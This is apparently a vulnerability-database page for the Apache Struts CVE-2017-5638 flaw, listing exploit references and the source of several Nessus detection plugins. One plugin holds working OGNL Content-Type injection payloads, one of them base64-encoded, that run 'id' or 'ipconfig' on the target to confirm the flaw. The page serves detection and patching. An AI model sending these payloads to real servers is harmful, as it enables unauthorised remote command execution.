Vulnerabilities > CVE-2017-5638 - Improper Handling of Exceptional Conditions vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Exploit-Db
description Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit). CVE-2017-5638. Remote exploit for Multiple platform. Tags: Metasploit Framework file exploits/multiple/remote/41614.rb id EDB-ID:41614 last seen 2017-03-15 modified 2017-03-15 platform multiple port 8080 published 2017-03-15 reporter Exploit-DB source https://www.exploit-db.com/download/41614/ title Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) type remote description Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution. CVE-2017-5638. Webapps exploit for Linux platform file exploits/linux/webapps/41570.py id EDB-ID:41570 last seen 2017-03-10 modified 2017-03-07 platform linux port published 2017-03-07 reporter Exploit-DB source https://www.exploit-db.com/download/41570/ title Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution type webapps
Metasploit
description | This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk. |
id | MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL |
last seen | 2020-06-04 |
modified | 2019-06-24 |
published | 2017-03-09 |
references | |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_content_type_ognl.rb |
title | Apache Struts Jakarta Multipart Parser OGNL Injection |
Nessus
NASL family Windows NASL id ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL description Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities. - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501) - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542) - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638) In addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application last seen 2020-06-05 modified 2020-06-01 plugin id 136998 published 2020-06-01 reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/136998 title Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU) code # # (C) Tenable Network Security, Inc. # include('compat.inc'); if (description) { script_id(136998); script_version("1.3"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/07/27"); script_cve_id( "CVE-2015-7501", "CVE-2016-0714", "CVE-2017-3540", "CVE-2017-3541", "CVE-2017-3542", "CVE-2017-3543", "CVE-2017-3545", "CVE-2017-3554", "CVE-2017-3591", "CVE-2017-3593", "CVE-2017-3594", "CVE-2017-3595", "CVE-2017-3596", "CVE-2017-3597", "CVE-2017-3598", "CVE-2017-3602", "CVE-2017-3603", "CVE-2017-5638" ); script_xref(name:"IAVA", value:"2017-A-0113"); script_name(english:"Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)"); script_set_attribute(attribute:"synopsis", value: "An application running on the remote host is affected by multiple security vulnerabilities."); script_set_attribute(attribute:"description", value: "Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities. - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501) - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542) - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638) In addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"https://www.oracle.com/security-alerts/cpuapr2017.html"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/18"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2020/06/01"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_webcenter_sites_installed.nbin"); script_require_keys("SMB/WebCenter_Sites/Installed"); exit(0); } port = get_kb_item('SMB/transport'); if (isnull(port)) port = 445; get_kb_item_or_exit('SMB/WebCenter_Sites/Installed'); versions = get_kb_list('SMB/WebCenter_Sites/*/Version'); if (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.'); report = ''; foreach key (keys(versions)) { fix = ''; version = versions[key]; revision = get_kb_item(key - '/Version' + '/Revision'); path = get_kb_item(key - '/Version' + '/Path'); if (isnull(version) || isnull(revision)) continue; # Patch 25883419 - 11.1.1.8.0 < Revision 184000 if (version =~ "^11\.1\.1\.8\.0$" && revision < 184000) { fix = '\n Fixed revision : 184000' + '\n Required patch : 25883419'; } # Patch 25806935 - 12.2.1.0.0 < Revision 184040 else if (version =~ "^12\.2\.1\.0\.0$" && revision < 184040) { fix = '\n Fixed revision : 184040' + '\n Required patch : 25806935'; } # Patch 25806943 - 12.2.1.1.0 < Revision 184025 else if (version =~ "^12\.2\.1\.1\.0$" && revision < 184025) { fix = '\n Fixed revision : 184025' + '\n Required patch : 25806943'; } # Patch 25806946 - 12.2.1.2.0 < Revision 184026 else if (version =~ "^12\.2\.1\.2\.0$" && revision < 184026) { fix = '\n Fixed revision : 184026' + '\n Required patch : 25806946'; } if (fix != '') { if (!isnull(path)) report += '\n Path : ' + path; report += '\n Version : ' + version + '\n Revision : ' + revision + fix + '\n'; } } if (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE); else audit(AUDIT_INST_VER_NOT_VULN, "Oracle WebCenter Sites");
NASL family CGI abuses NASL id STRUTS_2_5_10_1_RCE.NASL description The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user. last seen 2020-06-01 modified 2020-06-02 plugin id 97610 published 2017-03-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97610 title Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(97610); script_version("1.21"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2017-5638"); script_bugtraq_id(96729); script_xref(name:"CERT", value:"834067"); script_xref(name:"EDB-ID", value:"41570"); script_xref(name:"EDB-ID", value:"41614"); script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)"); script_summary(english:"Attempts to execute arbitrary commands on the remote web server."); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a web application that uses a Java framework that is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user."); script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"); # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later. Alternatively, apply the workaround referenced in the vendor advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl", "webmirror.nasl"); script_require_ports("Services/www", 80, 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("http.inc"); include("misc_func.inc"); port = get_http_port(default:8080); cgis = get_kb_list('www/' + port + '/cgi'); urls = make_list('/'); # To identify actions that we can test the exploit on we will look # for files with the .action / .jsp / .do suffix from the KB. if (!isnull(cgis)) { foreach cgi (cgis) { match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi); if (match) { urls = make_list(urls, match[0]); if (!thorough_tests) break; } match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi); if (!isnull(match2)) { urls = make_list(urls, match2[0]); if (!thorough_tests) break; } match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi); if (!isnull(match3)) { urls = make_list(urls, match3[0]); if (!thorough_tests) break; } if (cgi =~ "struts2?(-rest)?-showcase") { urls = make_list(urls, cgi); if (!thorough_tests) break; } } } if (thorough_tests) { cgi2 = get_kb_list('www/' + port + '/content/extensions/act*'); if (!isnull(cgi2)) urls = make_list(urls, cgi2); cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp'); if (!isnull(cgi3)) urls = make_list(urls, cgi3); cgi4 = get_kb_list('www/' + port + '/content/extensions/do'); if (!isnull(cgi4)) urls = make_list(urls, cgi4); } urls = list_uniq(urls); vuln = FALSE; rand_var = rand_str(length:8); header_payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','" + rand_var + "')}.multipart/form-data"; headers_1 = make_array("Content-Type", header_payload); # The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV # vendors. # {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'})) exploit = "JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX"; exploit += "h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ"; exploit += "lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w"; exploit += "aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb"; exploit += "D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi"; exploit += "5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t"; exploit += "hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz"; exploit += "KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja"; exploit += "XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG"; exploit += "9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N"; exploit += "tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn"; exploit += "fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL"; exploit += "nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS"; exploit += "4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB"; exploit += "nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv"; exploit += "bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI"; exploit += "3JvcykpLigjcm9zLmZsdXNoKCkpfQo="; headers_2 = make_array("Content-Type", chomp(base64_decode(str:exploit))); # Since struts apps could be taking longer timeout = get_read_timeout() * 2; if(timeout < 10) timeout = 10; http_set_read_timeout(timeout); foreach url (urls) { ############################################ # Method 1 ############################################ res = http_send_recv3( method : "GET", item : url, port : port, add_headers : headers_1, exit_on_fail : TRUE ); if ( ("X-Tenable: "+ rand_var ) >< res[1] ) vuln = TRUE; # Stop after first vulnerable Struts app is found if (vuln) break; ############################################ # Method 2 ############################################ cmd_pats = make_array(); cmd_pats['id'] = "uid=[0-9]+.*\sgid=[0-9]+.*"; cmd_pats['ipconfig'] = "Subnet Mask|Windows IP|IP(v(4|6)?)? Address"; res = http_send_recv3( method : "GET", item : url, port : port, add_headers : headers_2, exit_on_fail : TRUE ); if ("Windows IP" >< res[2] || "uid" >< res[2]) { if (pgrep(pattern:cmd_pats['id'], string:res[2])) { output = strstr(res[2], "uid"); if (!empty_or_null(output)) { vuln = TRUE; vuln_url = build_url(qs:url, port:port); break; } } else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2])) { output = strstr(res[2], "Windows IP"); if (!empty_or_null(output)) { vuln = TRUE; vuln_url = build_url(qs:url, port:port); break; } } } } if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.'); security_report_v4( port : port, severity : SECURITY_HOLE, generic : TRUE, request : make_list(http_last_sent_request()), output : chomp(output) );
NASL family Misc. NASL id STRUTS_2_5_10_1_WIN_LOCAL.NASL description The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code. Note that Nessus has not tested for this issue but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 97576 published 2017-03-07 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97576 title Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(97576); script_version("1.21"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2017-5638"); script_bugtraq_id(96729); script_xref(name:"CERT", value:"834067"); script_xref(name:"EDB-ID", value:"41570"); script_xref(name:"EDB-ID", value:"41614"); script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)"); script_summary(english:"Checks the Struts 2 version."); script_set_attribute(attribute:"synopsis", value: "The remote host contains a web application that uses a Java framework that is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"); # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-046"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later. Alternatively, apply the workaround referenced in the vendor advisory."); script_set_attribute(attribute:"agent", value:"all"); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/07"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin"); script_require_keys("Settings/ParanoidReport"); script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts"); exit(0); } include("vcf.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); app_info = vcf::combined_get_app_info(app:"Apache Struts"); vcf::check_granularity(app_info:app_info, sig_segments:2); constraints = [ { "min_version" : "2.3.5", "max_version" : "2.3.31", "fixed_version" : "2.3.32" }, { "min_version" : "2.5", "max_version" : "2.5.10", "fixed_version" : "2.5.10.1" } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
NASL family Misc. NASL id ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL description The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition. (CVE-2016-1181) - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506) - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-3531) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638) last seen 2020-06-01 modified 2020-06-02 plugin id 99528 published 2017-04-21 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99528 title Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(99528); script_version("1.12"); script_cvs_date("Date: 2019/11/13"); script_cve_id( "CVE-2016-1181", "CVE-2017-3506", "CVE-2017-3531", "CVE-2017-5638" ); script_bugtraq_id( 91068, 91787, 96729, 97884 ); script_xref(name:"CERT", value:"834067"); script_xref(name:"EDB-ID", value:"41570"); script_xref(name:"EDB-ID", value:"41614"); script_xref(name:"TRA", value:"TRA-2017-16"); script_xref(name:"ZDI", value:"ZDI-16-444"); script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)"); script_summary(english:"Checks for the patch."); script_set_attribute(attribute:"synopsis", value: "An application server installed on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition. (CVE-2016-1181) - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506) - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-3531) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)"); # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?623d2c22"); # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?eb4db3c7"); script_set_attribute(attribute:"see_also", value:"https://support.oracle.com/rs?type=doc&id=2228898.1"); script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2017-16"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-16-444/"); script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"); # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory."); script_set_attribute(attribute:"agent", value:"all"); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/07"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/21"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_weblogic_server_installed.nbin"); script_require_keys("installed_sw/Oracle WebLogic Server"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("install_func.inc"); app_name = "Oracle WebLogic Server"; install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE); ohome = install["Oracle Home"]; subdir = install["path"]; version = install["version"]; fix = NULL; fix_ver = NULL; # individual security patches if (version =~ "^10\.3\.6\.") { fix_ver = "10.3.6.0.170418"; fix = "25388747"; } else if (version =~ "^12\.1\.3\.") { fix_ver = "12.1.3.0.170418"; fix = "25388793"; } else if (version =~ "^12\.2\.1\.0($|[^0-9])") { fix_ver = "12.2.1.0.170418"; fix = "25388847"; } else if (version =~ "^12\.2\.1\.1($|[^0-9])") { fix_ver = "12.2.1.1.170418"; fix = "25388843"; } else if (version =~ "^12\.2\.1\.2($|[^0-9])") { fix_ver = "12.2.1.2.170418"; fix = "25388866"; } if (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1) { port = 0; report = '\n Oracle home : ' + ohome + '\n Install path : ' + subdir + '\n Version : ' + version + '\n Required patch : ' + fix + '\n'; security_report_v4(extra:report, port:port, severity:SECURITY_HOLE); } else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
